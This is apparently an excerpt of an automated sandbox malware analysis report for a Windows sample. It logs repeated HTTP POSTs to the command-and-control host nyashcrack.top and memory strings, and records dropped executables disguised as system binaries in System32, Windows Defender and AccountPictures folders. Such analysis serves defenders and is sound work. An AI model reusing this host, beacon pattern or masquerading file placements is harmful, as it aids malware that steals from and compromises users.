                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 161268Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1732Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1024Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1032Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1720Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 306039cm.nyashcrack.top
                            Source: unknownHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                            Source: qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D44D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.55.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003547000.00000004.00000800.00020000.00000000.sdmp, 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D51A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4F4000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                            Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000001C.00000002.3275003437.00000280ACA4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3292176472.00000240A152A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                            Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMPJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9B880D4C0_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9B880E430_2_00007FFD9B880E43
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9BC78F480_2_00007FFD9BC78F48
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9BC790F00_2_00007FFD9BC790F0
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9BC7B90D0_2_00007FFD9BC7B90D
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeCode function: 48_2_00007FFD9B880D4C48_2_00007FFD9B880D4C
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeCode function: 48_2_00007FFD9B88934848_2_00007FFD9B889348
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeCode function: 48_2_00007FFD9B88926948_2_00007FFD9B889269
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeCode function: 48_2_00007FFD9B8888DD48_2_00007FFD9B8888DD
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 49_2_00007FFD9B8B0D4C49_2_00007FFD9B8B0D4C
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 49_2_00007FFD9B8B0E4349_2_00007FFD9B8B0E43
                            Source: C:\Users\Public\AccountPictures\winlogon.exeCode function: 52_2_00007FFD9B870D4C52_2_00007FFD9B870D4C
                            Source: C:\Users\Public\AccountPictures\winlogon.exeCode function: 52_2_00007FFD9B870E4352_2_00007FFD9B870E43
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 53_2_00007FFD9B88934853_2_00007FFD9B889348
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 53_2_00007FFD9B88926953_2_00007FFD9B889269
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 53_2_00007FFD9B8888DD53_2_00007FFD9B8888DD
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 53_2_00007FFD9B880D4C53_2_00007FFD9B880D4C
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeCode function: 53_2_00007FFD9B880E4353_2_00007FFD9B880E43
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\JzShoUtR.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                            Source: 4si9noTBNw.exe, 00000000.00000002.1842455587.000000001C565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 00000000.00000000.1668729661.0000000001138000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002EEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 0000002A.00000002.2361041844.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exe, 0000002A.00000002.2361041844.00000000033E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
                            Source: 4si9noTBNw.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: 4si9noTBNw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: VTixufCejPQZEvXiB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: VTixufCejPQZEvXiB.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: VTixufCejPQZEvXiB.exe1.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
